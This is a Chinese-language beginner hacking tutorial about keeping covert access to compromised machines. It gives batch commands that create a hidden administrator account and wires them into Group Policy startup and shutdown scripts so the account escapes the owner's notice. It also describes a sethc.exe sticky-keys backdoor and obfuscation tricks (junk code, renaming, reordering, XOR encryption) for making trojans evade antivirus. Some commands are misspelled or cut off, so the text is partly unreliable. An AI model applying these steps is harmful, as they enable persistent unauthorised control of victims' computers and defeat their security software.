后门技术和混淆技术个人浅谈 -电脑资料

    hanxiaolian

    后门我想这个大家都知道吧!就不解释了!不知道的可以问我们的百度老师!

    当大家入侵主机都会给主机留后门吧!方面以后进入!可是木马是毕竟是恶意程序!就算是免杀!时间长了杀毒软件更新也会被杀的!所以要长久控制就要安装隐形后门!老鸟就飘过吧!呵呵!

    下面要教大家建立无法检查的隐藏后门原理,利用开关机脚本创建属于自己的管理员账号!入侵时我们都会搞到管理员账号密码，

后门技术和混淆技术个人浅谈

    @echo off(禁止用户回显信息)

    net user hxl 77169 /add

    net loaclgroup administrators hxl /add

    原创文章就这个麻烦 代码还得自己打.....

    ok了吧!保存为bat的批处理 这是关机脚本 下面再同理创建开机脚本

    @echo off

    net user hxl /del

    然后点开始运行gpedit.msc 启动组策略!

    展开计算机配置win配置脚本(启动 关机)

    点启动属性点击显示文件目录改为刚才创建的脚本

    应用就生效了同理关机脚本也修改

    如果肉鸡管理员是位菜鸟就可以搞定了!但是如果是位行内人士!就得换方法了!

    介绍一个特殊的后门账号

    让开机时不让管理员检测到我们添加账号了!

    exe +h

    Attrib c:\windows\System32\Dllcache\Sethc.exe +h

    这个是将sethc辅助工具换成explorer

    紧接着就可以使用shift后门工具了!

    看来这点内容满足不了大家，下面浅谈下使用代码混淆技术免杀脚本后门，这是一种用于目标代码和软件知识产权保护的交换技术!

    不会改动源程序功能! 免杀里面的花指令就是这门技术的一种!

    还有这个和加密是不一样的!!大家别混了!

    加密是防止未经授权使用只能非法使用

    我们要讲的是混淆技术!

    分为4种!!哦!

    1 词法交换 其实就是捣乱函数变量 嘻嘻!

    2 控制流交换 替换循环时的代码

    3 数据交换 数组 变量之间交换 ...

    4 类结构交换

    概念就这些了，

电脑资料

    具体操作呢...工具打开木马服务端

    根据上面的浅谈下实践

    第一种：添加垃圾代码或注释

    这里就是，添加注释

    "byhxl77169"这样的垃圾代码就可以了

    二 语句的续行，加入空白字符

    适当位置保持断行缩进即可免杀

    使用下面线空格tab...还有：号 差点忘了

    三 变量 字符串 函数名 混淆

    使用字符分割 重组 变化

    大小改变

    变量赋值

    四 代码段交换 指令交换 函数顺序改变混淆

    记住要 1对1 交换哦!!!

    五 加密混淆

    大家都知道杀毒软件，有启发式扫描技术，所以混淆属于多态技术，所以需要加密，简单的加密方法 ascll 码交换加密无效指加密、异或加密。

    混淆技术相关的太多在这里不能全部说清楚!等以后慢慢说吧!

    混淆学好了，免杀不错的!这里说的比较浅!适合新手学习!!